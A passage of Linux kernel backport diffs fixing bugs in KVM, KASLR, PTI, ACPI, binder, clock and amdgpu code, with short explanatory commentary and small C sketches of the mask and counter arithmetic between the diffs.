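The effect of the xstate.h change is simple mask arithmetic: the set of independent features is now bounded by what the CPU actually enumerated (max_features) rather than by the compile-time constant. A toy illustration with a made-up max_features value (bit 15 is LBR, as in the kernel's enum xfeature; everything else here is hypothetical):

    #include <stdio.h>
    #include <stdint.h>

    #define XFEATURE_MASK_LBR               (1ULL << 15)
    #define XFEATURE_MASK_INDEPENDENT       XFEATURE_MASK_LBR

    int main(void)
    {
            /* hypothetical CPU that does not enumerate the LBR xfeature */
            uint64_t max_features = 0x207;
            uint64_t independent = max_features & XFEATURE_MASK_INDEPENDENT;

            /* the old code would have used 0x8000 here regardless */
            printf("%#llx\n", (unsigned long long)independent); /* 0 */
            return 0;
    }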
+diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c
+index 4a663812562db..a96facc051391 100644
+--- a/arch/x86/kvm/svm/svm.c
++++ b/arch/x86/kvm/svm/svm.c
+@@ -2756,6 +2756,12 @@ static int svm_get_msr(struct kvm_vcpu *vcpu, struct msr_data *msr_info)
+ 	case MSR_CSTAR:
+ 		msr_info->data = svm->vmcb01.ptr->save.cstar;
+ 		break;
++	case MSR_GS_BASE:
++		msr_info->data = svm->vmcb01.ptr->save.gs.base;
++		break;
++	case MSR_FS_BASE:
++		msr_info->data = svm->vmcb01.ptr->save.fs.base;
++		break;
+ 	case MSR_KERNEL_GS_BASE:
+ 		msr_info->data = svm->vmcb01.ptr->save.kernel_gs_base;
+ 		break;
+@@ -2982,6 +2988,12 @@ static int svm_set_msr(struct kvm_vcpu *vcpu, struct msr_data *msr)
+ 	case MSR_CSTAR:
+ 		svm->vmcb01.ptr->save.cstar = data;
+ 		break;
++	case MSR_GS_BASE:
++		svm->vmcb01.ptr->save.gs.base = data;
++		break;
++	case MSR_FS_BASE:
++		svm->vmcb01.ptr->save.fs.base = data;
++		break;
+ 	case MSR_KERNEL_GS_BASE:
+ 		svm->vmcb01.ptr->save.kernel_gs_base = data;
+ 		break;
+@@ -4960,6 +4972,9 @@ static __init void svm_set_cpu_caps(void)
+ 
+ 	/* CPUID 0x8000001F (SME/SEV features) */
+ 	sev_set_cpu_caps();
++
++	/* Don't advertise Bus Lock Detect to guest if SVM support is absent */
++	kvm_cpu_cap_clear(X86_FEATURE_BUS_LOCK_DETECT);
+ }
+ 
+ static __init int svm_hardware_setup(void)
+diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
+index 658a88483d8b6..4e778ba6a5d47 100644
+--- a/arch/x86/kvm/x86.c
++++ b/arch/x86/kvm/x86.c
+@@ -5747,7 +5747,9 @@ long kvm_arch_vcpu_ioctl(struct file *filp,
+ 		if (copy_from_user(&events, argp, sizeof(struct kvm_vcpu_events)))
+ 			break;
+ 
++		kvm_vcpu_srcu_read_lock(vcpu);
+ 		r = kvm_vcpu_ioctl_x86_set_vcpu_events(vcpu, &events);
++		kvm_vcpu_srcu_read_unlock(vcpu);
+ 		break;
+ 	}
+ 	case KVM_GET_DEBUGREGS: {
+diff --git a/arch/x86/lib/iomem.c b/arch/x86/lib/iomem.c
+index e0411a3774d49..5eecb45d05d5d 100644
+--- a/arch/x86/lib/iomem.c
++++ b/arch/x86/lib/iomem.c
+@@ -25,6 +25,9 @@ static __always_inline void rep_movs(void *to, const void *from, size_t n)
+ 
+ static void string_memcpy_fromio(void *to, const volatile void __iomem *from, size_t n)
+ {
++	const void *orig_to = to;
++	const size_t orig_n = n;
++
+ 	if (unlikely(!n))
+ 		return;
+ 
+@@ -39,7 +42,7 @@ static void string_memcpy_fromio(void *to, const volatile void __iomem *from, si
+ 	}
+ 	rep_movs(to, (const void *)from, n);
+ 	/* KMSAN must treat values read from devices as initialized. */
+-	kmsan_unpoison_memory(to, n);
++	kmsan_unpoison_memory(orig_to, orig_n);
+ }
+ 
+ static void string_memcpy_toio(volatile void __iomem *to, const void *from, size_t n)
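The underlying bug class is generic: the alignment prologue of string_memcpy_fromio() advances 'to' and shrinks 'n' before the bulk copy, so unpoisoning (to, n) at the end only covered the aligned tail. A compact runnable sketch of the save-the-originals pattern, with mark_initialized() as a hypothetical stand-in for kmsan_unpoison_memory():

    #include <stdio.h>
    #include <stdint.h>
    #include <string.h>

    /* stand-in for kmsan_unpoison_memory(): just report the range */
    static void mark_initialized(void *p, size_t n)
    {
            printf("unpoison %p + %zu\n", p, n);
    }

    static void copy_fromio_sketch(void *to, const char *from, size_t n)
    {
            void *orig_to = to;     /* saved before the prologue mutates them */
            size_t orig_n = n;

            while (n && ((uintptr_t)to & 3)) {      /* byte-wise head alignment */
                    *(char *)to = *from++;
                    to = (char *)to + 1;
                    n--;
            }
            memcpy(to, from, n);    /* bulk copy of the remainder */

            /* cover the whole destination, not just the aligned tail */
            mark_initialized(orig_to, orig_n);
    }

    int main(void)
    {
            char src[16] = "0123456789abcde", dst[16];

            copy_fromio_sketch(dst + 1, src, 8);    /* deliberately unaligned */
            return 0;
    }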
+diff --git a/arch/x86/mm/init_64.c b/arch/x86/mm/init_64.c
+index 3f040c6e5d13a..6d294d24e488e 100644
+--- a/arch/x86/mm/init_64.c
++++ b/arch/x86/mm/init_64.c
+@@ -950,8 +950,12 @@ static void update_end_of_memory_vars(u64 start, u64 size)
+ int add_pages(int nid, unsigned long start_pfn, unsigned long nr_pages,
+ 	      struct mhp_params *params)
+ {
++	unsigned long end = ((start_pfn + nr_pages) << PAGE_SHIFT) - 1;
+ 	int ret;
+ 
++	if (WARN_ON_ONCE(end > PHYSMEM_END))
++		return -ERANGE;
++
+ 	ret = __add_pages(nid, start_pfn, nr_pages, params);
+ 	WARN_ON_ONCE(ret);
+ 
+diff --git a/arch/x86/mm/kaslr.c b/arch/x86/mm/kaslr.c
+index 37db264866b64..230f1dee4f095 100644
+--- a/arch/x86/mm/kaslr.c
++++ b/arch/x86/mm/kaslr.c
+@@ -47,13 +47,24 @@ static const unsigned long vaddr_end = CPU_ENTRY_AREA_BASE;
+  */
+ static __initdata struct kaslr_memory_region {
+ 	unsigned long *base;
++	unsigned long *end;
+ 	unsigned long size_tb;
+ } kaslr_regions[] = {
+-	{ &page_offset_base, 0 },
+-	{ &vmalloc_base, 0 },
+-	{ &vmemmap_base, 0 },
++	{
++		.base	= &page_offset_base,
++		.end	= &physmem_end,
++	},
++	{
++		.base	= &vmalloc_base,
++	},
++	{
++		.base	= &vmemmap_base,
++	},
+ };
+ 
++/* The end of the possible address space for physical memory */
++unsigned long physmem_end __ro_after_init;
++
+ /* Get size in bytes used by the memory region */
+ static inline unsigned long get_padding(struct kaslr_memory_region *region)
+ {
+@@ -82,6 +93,8 @@ void __init kernel_randomize_memory(void)
+ 	BUILD_BUG_ON(vaddr_end != CPU_ENTRY_AREA_BASE);
+ 	BUILD_BUG_ON(vaddr_end > __START_KERNEL_map);
+ 
++	/* Preset the end of the possible address space for physical memory */
++	physmem_end = ((1ULL << MAX_PHYSMEM_BITS) - 1);
+ 	if (!kaslr_memory_enabled())
+ 		return;
+ 
+@@ -128,11 +141,18 @@ void __init kernel_randomize_memory(void)
+ 		vaddr += entropy;
+ 		*kaslr_regions[i].base = vaddr;
+ 
++		/* Calculate the end of the region */
++		vaddr += get_padding(&kaslr_regions[i]);
+ 		/*
+-		 * Jump the region and add a minimum padding based on
+-		 * randomization alignment.
++		 * KASLR trims the maximum possible size of the
++		 * direct-map. Update the physmem_end boundary.
++		 * No rounding required as the region starts
++		 * PUD aligned and size is in units of TB.
+ 		 */
+-		vaddr += get_padding(&kaslr_regions[i]);
++		if (kaslr_regions[i].end)
++			*kaslr_regions[i].end = __pa_nodebug(vaddr - 1);
++
++		/* Add a minimum padding based on randomization alignment. */
+ 		vaddr = round_up(vaddr + 1, PUD_SIZE);
+ 		remain_entropy -= entropy;
+ 	}
+diff --git a/arch/x86/mm/pti.c b/arch/x86/mm/pti.c
+index 7b804c34c0201..d5f702ea4c781 100644
+--- a/arch/x86/mm/pti.c
++++ b/arch/x86/mm/pti.c
+@@ -241,7 +241,7 @@ static pmd_t *pti_user_pagetable_walk_pmd(unsigned long address)
+  *
+  * Returns a pointer to a PTE on success, or NULL on failure.
+  */
+-static pte_t *pti_user_pagetable_walk_pte(unsigned long address)
++static pte_t *pti_user_pagetable_walk_pte(unsigned long address, bool late_text)
+ {
+ 	gfp_t gfp = (GFP_KERNEL | __GFP_NOTRACK | __GFP_ZERO);
+ 	pmd_t *pmd;
+@@ -251,10 +251,15 @@ static pte_t *pti_user_pagetable_walk_pte(unsigned long address)
+ 	if (!pmd)
+ 		return NULL;
+ 
+-	/* We can't do anything sensible if we hit a large mapping. */
++	/* Large PMD mapping found */
+ 	if (pmd_large(*pmd)) {
+-		WARN_ON(1);
+-		return NULL;
++		/* Clear the PMD if we hit a large mapping from the first round */
++		if (late_text) {
++			set_pmd(pmd, __pmd(0));
++		} else {
++			WARN_ON_ONCE(1);
++			return NULL;
++		}
+ 	}
+ 
+ 	if (pmd_none(*pmd)) {
+@@ -283,7 +288,7 @@ static void __init pti_setup_vsyscall(void)
+ 	if (!pte || WARN_ON(level != PG_LEVEL_4K) || pte_none(*pte))
+ 		return;
+ 
+-	target_pte = pti_user_pagetable_walk_pte(VSYSCALL_ADDR);
++	target_pte = pti_user_pagetable_walk_pte(VSYSCALL_ADDR, false);
+ 	if (WARN_ON(!target_pte))
+ 		return;
+ 
+@@ -301,7 +306,7 @@ enum pti_clone_level {
+ 
+ static void
+ pti_clone_pgtable(unsigned long start, unsigned long end,
+-		  enum pti_clone_level level)
++		  enum pti_clone_level level, bool late_text)
+ {
+ 	unsigned long addr;
+ 
+@@ -390,7 +395,7 @@ pti_clone_pgtable(unsigned long start, unsigned long end,
+ 				return;
+ 
+ 			/* Allocate PTE in the user page-table */
+-			target_pte = pti_user_pagetable_walk_pte(addr);
++			target_pte = pti_user_pagetable_walk_pte(addr, late_text);
+ 			if (WARN_ON(!target_pte))
+ 				return;
+ 
+@@ -452,7 +457,7 @@ static void __init pti_clone_user_shared(void)
+ 		phys_addr_t pa = per_cpu_ptr_to_phys((void *)va);
+ 		pte_t *target_pte;
+ 
+-		target_pte = pti_user_pagetable_walk_pte(va);
++		target_pte = pti_user_pagetable_walk_pte(va, false);
+ 		if (WARN_ON(!target_pte))
+ 			return;
+ 
+@@ -475,7 +480,7 @@ static void __init pti_clone_user_shared(void)
+ 	start = CPU_ENTRY_AREA_BASE;
+ 	end   = start + (PAGE_SIZE * CPU_ENTRY_AREA_PAGES);
+ 
+-	pti_clone_pgtable(start, end, PTI_CLONE_PMD);
++	pti_clone_pgtable(start, end, PTI_CLONE_PMD, false);
+ }
+ #endif /* CONFIG_X86_64 */
+ 
+@@ -492,11 +497,11 @@ static void __init pti_setup_espfix64(void)
+ /*
+  * Clone the populated PMDs of the entry text and force it RO.
+  */
+-static void pti_clone_entry_text(void)
++static void pti_clone_entry_text(bool late)
+ {
+ 	pti_clone_pgtable((unsigned long) __entry_text_start,
+ 			  (unsigned long) __entry_text_end,
+-			  PTI_LEVEL_KERNEL_IMAGE);
++			  PTI_LEVEL_KERNEL_IMAGE, late);
+ }
+ 
+ /*
+@@ -571,7 +576,7 @@ static void pti_clone_kernel_text(void)
+ 	 * pti_set_kernel_image_nonglobal() did to clear the
+ 	 * global bit.
+ 	 */
+-	pti_clone_pgtable(start, end_clone, PTI_LEVEL_KERNEL_IMAGE);
++	pti_clone_pgtable(start, end_clone, PTI_LEVEL_KERNEL_IMAGE, false);
+ 
+ 	/*
+ 	 * pti_clone_pgtable() will set the global bit in any PMDs
+@@ -638,8 +643,15 @@ void __init pti_init(void)
+ 
+ 	/* Undo all global bits from the init pagetables in head_64.S: */
+ 	pti_set_kernel_image_nonglobal();
++
+ 	/* Replace some of the global bits just for shared entry text: */
+-	pti_clone_entry_text();
++	/*
++	 * This is very early in boot. Device and Late initcalls can do
++	 * modprobe before free_initmem() and mark_readonly(). This
++	 * pti_clone_entry_text() allows those user-mode-helpers to function,
++	 * but notably the text is still RW.
++	 */
++	pti_clone_entry_text(false);
+ 	pti_setup_espfix64();
+ 	pti_setup_vsyscall();
+ }
+@@ -656,10 +668,11 @@ void pti_finalize(void)
+ 	if (!boot_cpu_has(X86_FEATURE_PTI))
+ 		return;
+ 	/*
+-	 * We need to clone everything (again) that maps parts of the
+-	 * kernel image.
++	 * This is after free_initmem() (all initcalls are done) and we've done
++	 * mark_readonly(). Text is now NX which might've split some PMDs
++	 * relative to the early clone.
+ 	 */
+-	pti_clone_entry_text();
++	pti_clone_entry_text(true);
+ 	pti_clone_kernel_text();
+ 
+ 	debug_checkwx_user();
+diff --git a/drivers/acpi/acpi_processor.c b/drivers/acpi/acpi_processor.c
+index 6737b1cbf6d69..8bd5c4fa91f28 100644
+--- a/drivers/acpi/acpi_processor.c
++++ b/drivers/acpi/acpi_processor.c
+@@ -373,7 +373,7 @@ static int acpi_processor_add(struct acpi_device *device,
+ 
+ 	result = acpi_processor_get_info(device);
+ 	if (result) /* Processor is not physically present or unavailable */
+-		return 0;
++		goto err_clear_driver_data;
+ 
+ 	BUG_ON(pr->id >= nr_cpu_ids);
+ 
+@@ -388,7 +388,7 @@ static int acpi_processor_add(struct acpi_device *device,
+ 			"BIOS reported wrong ACPI id %d for the processor\n",
+ 			pr->id);
+ 		/* Give up, but do not abort the namespace scan. */
+-		goto err;
++		goto err_clear_driver_data;
+ 	}
+ 	/*
+ 	 * processor_device_array is not cleared on errors to allow buggy BIOS
+@@ -400,12 +400,12 @@ static int acpi_processor_add(struct acpi_device *device,
+ 	dev = get_cpu_device(pr->id);
+ 	if (!dev) {
+ 		result = -ENODEV;
+-		goto err;
++		goto err_clear_per_cpu;
+ 	}
+ 
+ 	result = acpi_bind_one(dev, device);
+ 	if (result)
+-		goto err;
++		goto err_clear_per_cpu;
+ 
+ 	pr->dev = dev;
+ 
+@@ -416,10 +416,11 @@ static int acpi_processor_add(struct acpi_device *device,
+ 	dev_err(dev, "Processor driver could not be attached\n");
+ 	acpi_unbind_one(dev);
+ 
+- err:
+-	free_cpumask_var(pr->throttling.shared_cpu_map);
+-	device->driver_data = NULL;
++ err_clear_per_cpu:
+ 	per_cpu(processors, pr->id) = NULL;
++ err_clear_driver_data:
++	device->driver_data = NULL;
++	free_cpumask_var(pr->throttling.shared_cpu_map);
+  err_free_pr:
+ 	kfree(pr);
+ 	return result;
+diff --git a/drivers/android/binder.c b/drivers/android/binder.c
+index e0ef648df265b..931aa2609f3b6 100644
+--- a/drivers/android/binder.c
++++ b/drivers/android/binder.c
+@@ -3329,6 +3329,7 @@ static void binder_transaction(struct binder_proc *proc,
+ 		 */
+ 		copy_size = object_offset - user_offset;
+ 		if (copy_size && (user_offset > object_offset ||
++				object_offset > tr->data_size ||
+ 				binder_alloc_copy_user_to_buffer(
+ 					&target_proc->alloc,
+ 					t->buffer, user_offset,
+diff --git a/drivers/ata/libata-core.c b/drivers/ata/libata-core.c
+index 826d9a102a51a..14bcfebf20b8f 100644
+--- a/drivers/ata/libata-core.c
++++ b/drivers/ata/libata-core.c
+@@ -5532,8 +5532,10 @@ struct ata_host *ata_host_alloc(struct device *dev, int max_ports)
+ 	}
+ 
+ 	dr = devres_alloc(ata_devres_release, 0, GFP_KERNEL);
+-	if (!dr)
++	if (!dr) {
++		kfree(host);
+ 		goto err_out;
++	}
+ 
+ 	devres_add(dev, dr);
+ 	dev_set_drvdata(dev, host);
+diff --git a/drivers/ata/pata_macio.c b/drivers/ata/pata_macio.c
+index 9ccaac9e2bc31..f19ede2965a15 100644
+--- a/drivers/ata/pata_macio.c
++++ b/drivers/ata/pata_macio.c
+@@ -540,7 +540,8 @@ static enum ata_completion_errors pata_macio_qc_prep(struct ata_queued_cmd *qc)
+ 
+ 		while (sg_len) {
+ 			/* table overflow should never happen */
+-			BUG_ON (pi++ >= MAX_DCMDS);
++			if (WARN_ON_ONCE(pi >= MAX_DCMDS))
++				return AC_ERR_SYSTEM;
+ 
+ 			len = (sg_len < MAX_DBDMA_SEG) ? sg_len : MAX_DBDMA_SEG;
+ 			table->command = cpu_to_le16(write ? OUTPUT_MORE: INPUT_MORE);
+@@ -552,11 +553,13 @@ static enum ata_completion_errors pata_macio_qc_prep(struct ata_queued_cmd *qc)
+ 			addr += len;
+ 			sg_len -= len;
+ 			++table;
++			++pi;
+ 		}
+ 	}
+ 
+ 	/* Should never happen according to Tejun */
+-	BUG_ON(!pi);
++	if (WARN_ON_ONCE(!pi))
++		return AC_ERR_SYSTEM;
+ 
+ 	/* Convert the last command to an input/output */
+ 	table--;
+diff --git a/drivers/base/devres.c b/drivers/base/devres.c
+index f9add2ecdc554..35d1e2864696f 100644
+--- a/drivers/base/devres.c
++++ b/drivers/base/devres.c
+@@ -564,6 +564,7 @@ void * devres_open_group(struct device *dev, void *id, gfp_t gfp)
+ 	grp->id = grp;
+ 	if (id)
+ 		grp->id = id;
++	grp->color = 0;
+ 
+ 	spin_lock_irqsave(&dev->devres_lock, flags);
+ 	add_dr(dev, &grp->node[0]);
+diff --git a/drivers/block/ublk_drv.c b/drivers/block/ublk_drv.c
+index 3fa74051f31b4..bfd643856f647 100644
+--- a/drivers/block/ublk_drv.c
++++ b/drivers/block/ublk_drv.c
+@@ -1915,6 +1915,8 @@ static int ublk_ctrl_start_recovery(struct ublk_device *ub,
+ 	mutex_lock(&ub->mutex);
+ 	if (!ublk_can_use_recovery(ub))
+ 		goto out_unlock;
++	if (!ub->nr_queues_ready)
++		goto out_unlock;
+ 	/*
+ 	 * START_RECOVERY is only allowed after:
+ 	 *
+diff --git a/drivers/clk/qcom/clk-alpha-pll.c b/drivers/clk/qcom/clk-alpha-pll.c
+index 1973d79c94655..391b8da8849bd 100644
+--- a/drivers/clk/qcom/clk-alpha-pll.c
++++ b/drivers/clk/qcom/clk-alpha-pll.c
+@@ -40,7 +40,7 @@
+ 
+ #define PLL_USER_CTL(p)		((p)->offset + (p)->regs[PLL_OFF_USER_CTL])
+ # define PLL_POST_DIV_SHIFT	8
+-# define PLL_POST_DIV_MASK(p)	GENMASK((p)->width, 0)
++# define PLL_POST_DIV_MASK(p)	GENMASK((p)->width - 1, 0)
+ # define PLL_ALPHA_EN		BIT(24)
+ # define PLL_ALPHA_MODE		BIT(25)
+ # define PLL_VCO_SHIFT		20
+@@ -1421,8 +1421,8 @@ clk_trion_pll_postdiv_set_rate(struct clk_hw *hw, unsigned long rate,
+ 	}
+ 
+ 	return regmap_update_bits(regmap, PLL_USER_CTL(pll),
+-				  PLL_POST_DIV_MASK(pll) << PLL_POST_DIV_SHIFT,
+-				  val << PLL_POST_DIV_SHIFT);
++				  PLL_POST_DIV_MASK(pll) << pll->post_div_shift,
++				  val << pll->post_div_shift);
+ }
+ 
+ const struct clk_ops clk_alpha_pll_postdiv_trion_ops = {
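The PLL_POST_DIV_MASK fix is a classic GENMASK() off-by-one: GENMASK(h, l) sets bits h..l inclusive, so a field that is 'width' bits wide needs GENMASK(width - 1, 0). A quick self-check with a user-space rendering of the macro (the kernel version is BITS_PER_LONG-aware):

    #include <stdio.h>

    /* 32-bit user-space rendering of GENMASK(h, l): bits h..l set */
    #define GENMASK(h, l) ((~0u >> (31 - (h))) & (~0u << (l)))

    int main(void)
    {
            unsigned int width = 4; /* a 4-bit post-divider field */

            printf("%#x\n", GENMASK(width, 0));     /* 0x1f: one bit too wide */
            printf("%#x\n", GENMASK(width - 1, 0)); /* 0xf: the intended mask */
            return 0;
    }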
+diff --git a/drivers/clocksource/timer-imx-tpm.c b/drivers/clocksource/timer-imx-tpm.c
+index bd64a8a8427f3..92c025b70eb62 100644
+--- a/drivers/clocksource/timer-imx-tpm.c
++++ b/drivers/clocksource/timer-imx-tpm.c
+@@ -83,20 +83,28 @@ static u64 notrace tpm_read_sched_clock(void)
+ static int tpm_set_next_event(unsigned long delta,
+ 				struct clock_event_device *evt)
+ {
+-	unsigned long next, now;
++	unsigned long next, prev, now;
+ 
+-	next = tpm_read_counter();
+-	next += delta;
++	prev = tpm_read_counter();
++	next = prev + delta;
+ 	writel(next, timer_base + TPM_C0V);
+ 	now = tpm_read_counter();
+ 
++	/*
++	 * Need to wait for CNT to increase by at least 1 cycle to make
++	 * sure the C0V has been updated into HW.
++	 */
++	if ((next & 0xffffffff) != readl(timer_base + TPM_C0V))
++		while (now == tpm_read_counter())
++			;
++
+ 	/*
+ 	 * NOTE: We have observed, with very small probability, that bus
+ 	 * fabric contention between the GPU and the A7 can delay the write
+ 	 * to the CNT registers by a few cycles, which may cause the
+ 	 * min_delta event to be missed, so we add an ETIME check here for
+ 	 * that case.
+ 	 */
+-	return (int)(next - now) <= 0 ? -ETIME : 0;
++	return (now - prev) >= delta ? -ETIME : 0;
+ }
+ 
+ static int tpm_set_state_oneshot(struct clock_event_device *evt)
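The rewritten expiry test deserves a closer look. On a free-running 32-bit up-counter, the old '(int)(next - now) <= 0' misfires for large deltas and around wraparound, while '(now - prev) >= delta' compares elapsed ticks, which unsigned subtraction keeps correct across a wrap. A small self-check (values assumed for illustration):

    #include <stdio.h>
    #include <stdint.h>

    /* wrap-safe "did the deadline already pass?" on a 32-bit counter */
    static int deadline_missed(uint32_t prev, uint32_t now, uint32_t delta)
    {
            return (uint32_t)(now - prev) >= delta;
    }

    int main(void)
    {
            /* counter wrapped: prev near the top, now just past zero */
            printf("%d\n", deadline_missed(0xfffffff0u, 0x00000005u, 0x40)); /* 0: 21 ticks elapsed */
            printf("%d\n", deadline_missed(0xfffffff0u, 0x00000040u, 0x40)); /* 1: 80 ticks elapsed */
            return 0;
    }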
+diff --git a/drivers/clocksource/timer-of.c b/drivers/clocksource/timer-of.c
+index c3f54d9912be7..420202bf76e42 100644
+--- a/drivers/clocksource/timer-of.c
++++ b/drivers/clocksource/timer-of.c
+@@ -25,10 +25,7 @@ static __init void timer_of_irq_exit(struct of_timer_irq *of_irq)
+ 
+ 	struct clock_event_device *clkevt = &to->clkevt;
+ 
+-	if (of_irq->percpu)
+-		free_percpu_irq(of_irq->irq, clkevt);
+-	else
+-		free_irq(of_irq->irq, clkevt);
++	free_irq(of_irq->irq, clkevt);
+ }
+ 
+ /**
+@@ -42,9 +39,6 @@ static __init void timer_of_irq_exit(struct of_timer_irq *of_irq)
+  * - Get interrupt number by name
+  * - Get interrupt number by index
+  *
+- * When the interrupt is per CPU, 'request_percpu_irq()' is called,
+- * otherwise 'request_irq()' is used.
+- *
+  * Returns 0 on success, < 0 otherwise
+  */
+ static __init int timer_of_irq_init(struct device_node *np,
+@@ -69,12 +63,9 @@ static __init int timer_of_irq_init(struct device_node *np,
+ 		return -EINVAL;
+ 	}
+ 
+-	ret = of_irq->percpu ?
+-		request_percpu_irq(of_irq->irq, of_irq->handler,
+-				   np->full_name, clkevt) :
+-		request_irq(of_irq->irq, of_irq->handler,
+-			    of_irq->flags ? of_irq->flags : IRQF_TIMER,
+-			    np->full_name, clkevt);
++	ret = request_irq(of_irq->irq, of_irq->handler,
++			  of_irq->flags ? of_irq->flags : IRQF_TIMER,
++			  np->full_name, clkevt);
+ 	if (ret) {
+ 		pr_err("Failed to request irq %d for %pOF\n", of_irq->irq, np);
+ 		return ret;
+diff --git a/drivers/clocksource/timer-of.h b/drivers/clocksource/timer-of.h
+index a5478f3e8589d..01a2c6b7db065 100644
+--- a/drivers/clocksource/timer-of.h
++++ b/drivers/clocksource/timer-of.h
+@@ -11,7 +11,6 @@
+ struct of_timer_irq {
+ 	int irq;
+ 	int index;
+-	int percpu;
+ 	const char *name;
+ 	unsigned long flags;
+ 	irq_handler_t handler;
+diff --git a/drivers/crypto/qat/qat_common/adf_gen2_pfvf.c b/drivers/crypto/qat/qat_common/adf_gen2_pfvf.c
+index 70ef119639381..43af81fcab868 100644
+--- a/drivers/crypto/qat/qat_common/adf_gen2_pfvf.c
++++ b/drivers/crypto/qat/qat_common/adf_gen2_pfvf.c
+@@ -100,7 +100,9 @@ static u32 adf_gen2_disable_pending_vf2pf_interrupts(void __iomem *pmisc_addr)
+ 	errmsk3 |= ADF_GEN2_ERR_MSK_VF2PF(ADF_GEN2_VF_MSK);
+ 	ADF_CSR_WR(pmisc_addr, ADF_GEN2_ERRMSK3, errmsk3);
+ 
+-	errmsk3 &= ADF_GEN2_ERR_MSK_VF2PF(sources | disabled);
++	/* Update only section of errmsk3 related to VF2PF */
++	errmsk3 &= ~ADF_GEN2_ERR_MSK_VF2PF(ADF_GEN2_VF_MSK);
++	errmsk3 |= ADF_GEN2_ERR_MSK_VF2PF(sources | disabled);
+ 	ADF_CSR_WR(pmisc_addr, ADF_GEN2_ERRMSK3, errmsk3);
+ 
+ 	/* Return the sources of the (new) interrupt(s) */
+diff --git a/drivers/crypto/qat/qat_dh895xcc/adf_dh895xcc_hw_data.c b/drivers/crypto/qat/qat_dh895xcc/adf_dh895xcc_hw_data.c
+index cb3bdd3618fb0..85295c7ee0e0f 100644
+--- a/drivers/crypto/qat/qat_dh895xcc/adf_dh895xcc_hw_data.c
++++ b/drivers/crypto/qat/qat_dh895xcc/adf_dh895xcc_hw_data.c
+@@ -180,8 +180,12 @@ static u32 disable_pending_vf2pf_interrupts(void __iomem *pmisc_addr)
+ 	ADF_CSR_WR(pmisc_addr, ADF_GEN2_ERRMSK3, errmsk3);
+ 	ADF_CSR_WR(pmisc_addr, ADF_GEN2_ERRMSK5, errmsk5);
+ 
+-	errmsk3 &= ADF_DH895XCC_ERR_MSK_VF2PF_L(sources | disabled);
+-	errmsk5 &= ADF_DH895XCC_ERR_MSK_VF2PF_U(sources | disabled);
++	/* Update only section of errmsk3 and errmsk5 related to VF2PF */
++	errmsk3 &= ~ADF_DH895XCC_ERR_MSK_VF2PF_L(ADF_DH895XCC_VF_MSK);
++	errmsk5 &= ~ADF_DH895XCC_ERR_MSK_VF2PF_U(ADF_DH895XCC_VF_MSK);
++
++	errmsk3 |= ADF_DH895XCC_ERR_MSK_VF2PF_L(sources | disabled);
++	errmsk5 |= ADF_DH895XCC_ERR_MSK_VF2PF_U(sources | disabled);
+ 	ADF_CSR_WR(pmisc_addr, ADF_GEN2_ERRMSK3, errmsk3);
+ 	ADF_CSR_WR(pmisc_addr, ADF_GEN2_ERRMSK5, errmsk5);
+ 
+diff --git a/drivers/firmware/cirrus/cs_dsp.c b/drivers/firmware/cirrus/cs_dsp.c
+index 68005cce01360..cf4f4da0cb874 100644
+--- a/drivers/firmware/cirrus/cs_dsp.c
++++ b/drivers/firmware/cirrus/cs_dsp.c
+@@ -764,6 +764,9 @@ int cs_dsp_coeff_write_ctrl(struct cs_dsp_coeff_ctl *ctl,
+ 
+ 	lockdep_assert_held(&ctl->dsp->pwr_lock);
+ 
++	if (ctl->flags && !(ctl->flags & WMFW_CTL_FLAG_WRITEABLE))
++		return -EPERM;
++
+ 	if (len + off * sizeof(u32) > ctl->len)
+ 		return -EINVAL;
+ 
+diff --git a/drivers/gpio/gpio-rockchip.c b/drivers/gpio/gpio-rockchip.c
+index 200e43a6f4b4f..3c1e303aaca88 100644
+--- a/drivers/gpio/gpio-rockchip.c
++++ b/drivers/gpio/gpio-rockchip.c
+@@ -713,6 +713,7 @@ static int rockchip_gpio_probe(struct platform_device *pdev)
+ 		return -ENODEV;
+ 
+ 	pctldev = of_pinctrl_get(pctlnp);
++	of_node_put(pctlnp);
+ 	if (!pctldev)
+ 		return -EPROBE_DEFER;
+ 
+diff --git a/drivers/gpio/gpio-zynqmp-modepin.c b/drivers/gpio/gpio-zynqmp-modepin.c
+index a0d69387c1532..2f3c9ebfa78d1 100644
+--- a/drivers/gpio/gpio-zynqmp-modepin.c
++++ b/drivers/gpio/gpio-zynqmp-modepin.c
+@@ -146,6 +146,7 @@ static const struct of_device_id modepin_platform_id[] = {
+ 	{ .compatible = "xlnx,zynqmp-gpio-modepin", },
+ 	{ }
+ };
++MODULE_DEVICE_TABLE(of, modepin_platform_id);
+ 
+ static struct platform_driver modepin_platform_driver = {
+ 	.driver = {
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_display.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_display.c
+index aabde6ebb190e..cd0bccc95205d 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_display.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_display.c
+@@ -873,8 +873,7 @@ static int check_tiling_flags_gfx6(struct amdgpu_framebuffer *afb)
+ {
+ 	u64 micro_tile_mode;
+ 
+-	/* Zero swizzle mode means linear */
+-	if (AMDGPU_TILING_GET(afb->tiling_flags, SWIZZLE_MODE) == 0)
++	if (AMDGPU_TILING_GET(afb->tiling_flags, ARRAY_MODE) == 1) /* LINEAR_ALIGNED */
+ 		return 0;
+ 
+ 	micro_tile_mode = AMDGPU_TILING_GET(afb->tiling_flags, MICRO_TILE_MODE);
+@@ -998,6 +997,30 @@ static int amdgpu_display_verify_sizes(struct amdgpu_framebuffer *rfb)
+ 			block_width = 256 / format_info->cpp[i];
+ 			block_height = 1;
+ 			block_size_log2 = 8;
++		} else if (AMD_FMT_MOD_GET(TILE_VERSION, modifier) >= AMD_FMT_MOD_TILE_VER_GFX12) {
++			int swizzle = AMD_FMT_MOD_GET(TILE, modifier);
++
++			switch (swizzle) {
++			case AMD_FMT_MOD_TILE_GFX12_256B_2D:
++				block_size_log2 = 8;
++				break;
++			case AMD_FMT_MOD_TILE_GFX12_4K_2D:
++				block_size_log2 = 12;
++				break;
++			case AMD_FMT_MOD_TILE_GFX12_64K_2D:
++				block_size_log2 = 16;
++				break;
++			case AMD_FMT_MOD_TILE_GFX12_256K_2D:
++				block_size_log2 = 18;
++				break;
++			default:
++				drm_dbg_kms(rfb->base.dev,
++					    "Gfx12 swizzle mode with unknown block size: %d\n", swizzle);
++				return -EINVAL;
++			}
++
++			get_block_dimensions(block_size_log2, format_info->cpp[i],
